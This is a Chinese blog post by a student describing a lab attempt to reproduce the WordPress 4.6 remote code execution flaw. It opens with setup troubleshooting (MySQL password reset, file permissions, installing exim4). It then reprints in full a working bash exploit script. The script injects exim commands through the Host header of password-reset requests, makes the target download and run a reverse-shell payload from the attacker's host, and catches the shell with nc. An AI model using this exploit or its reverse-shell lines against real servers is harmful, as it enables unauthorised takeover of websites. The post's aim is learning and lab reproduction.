感觉在学校的日子每天都是复习备考度过。。。这么多考试,还要隔几天考一门!
但是在曝出wordpress4.6漏洞之后,也想体验一把复现的成就感
但是。。。这个poc条件很苛刻的,加上自己又很菜。。。我依旧没有成功,
这里主要写复现时遇到的问题
wordpress4.6安装
我以前第一个博客就是wordpress搭建的,所以也算轻车熟路了吧,具体的操作网上一堆教程
这里是4.6的安装包WordPress4.6.zip
下面就说一下安装可能遇到的问题。
wordpress安装包解压
如果解压之后再拖进vps是比较慢的,这时候你可以上传压缩包,然后解压
我们有时候想解压到具体目录,比如:/www/wwwroot/www.flywinky.info/
可以这样操作unzip xx.zip -d /www/wwwroot/www.flywinky.info/
mysql数据库不能连接-1
我并不知道这件事为什么每次我搭建的时候都会发生。
如果他说是账户名和密码错误的话,可以进行下面的操作
首先停止Mysql
sudo /usr/local/mysql/support-files/mysql.server stop
以安全模式启动
sudo mysqld_safe --skip-grant-tables
以没有密码登录mysql
首先你需要打开另一个shell,进行下面的操作
sudo mysqld_safe --skip-grant-tables
mysql> UPDATE mysql.user SET Password=PASSWORD('你的新密码') WHERE User='用户名';
重启Mysql
sudo /usr/local/mysql/support-files/mysql.server start
mysql数据库不能连接-2
即使重建密码,有时候也可能会出现你不知道自己到底建了什么数据库名。。。。
wordpress搭建的时候需要填写数据库名,这时候可以在shell端进行下面的操作查询
连接mysql
mysql -u root -ppassword
这里你可能遇到下图的问题,这是因为"-p"和“password"之间没有空格
查看数据库名
show databases;
PS:其他的一些数据库命令
不能更换主题和插件
后台安装插件或主题都提示需要输入FTP信息
出现这个问题,是因为文件目录权限问题,登录VPS
chmod -R 755 /home/wwwroot
chown -R www /home/wwwroot
poc的利用
poc出现报错
如下图,这里是因为windows里,编辑会存在换行 ,linux报错
用正则表达式进行去除' ',或者用下面的解决:
yum install dos2unix
dos2unix **.sh
poc修改
首先是host地址修改为靶机ip
然后user_login=admin,这里的admin一定要写成靶机里存在的用户名
还有就是靶机必须要安装exim4
sudo apt-get install exim4
用下面的命令进行配置,第一项选择第一个“internet site; mail is sent and received directly using SMTP”
然后一路默认就行了
dpkg-reconfigure exim4-config
PS:安装exim4
最后附上歪果仁作者的poc
rev_host="192.168.57.1" ##1
function prep_host_header() {
cmd="$1"
rce_cmd="${run{$cmd}}";
## replace / with ${substr{0}{1}{$spool_directory}}
##sed 's^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd="`echo $rce_cmd | sed 's^/^${substr{0}{1}{$spool_directory}}^g'`"
## replace ' ' (space) with
##sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^${substr{10}{1}{$tod_log}}^g'`"
##return "target(any -froot@localhost -be $rce_cmd null)"
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
##cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro" | base64 -d
echo "$intro2" | base64 -d
if [ "$##" -ne 1 ]; then
echo -e "Usage:
$0 target-wordpress-url
"
exit 1
fi
target="$1"
echo -ne "e[91m[*]�33[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then
echo -e "e[92m[*]�33[0m Guess I can't argue with that... Let's get started...
"
echo -e "e[92m[+]�33[0m Connected to the target"
## Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
## Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php? action=lostpassword ##2
echo -e "
e[92m[+]e[0m Payload sent successfully"
## Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword & ##3
echo -e "
e[92m[+]�33[0m Payload executed!"
echo -e "
e[92m[*]�33[0m Waiting for the target to send us a e[94mreverse shelle[0m...
"
nc -vv -l 1337
echo
else
echo -e "e[92m[+]�33[0m Responsible choice ;)
Exiting.
"
exit 0
fi
echo "Exiting..."
exit 0
PS:漏洞利用详情(扶墙)
POC演示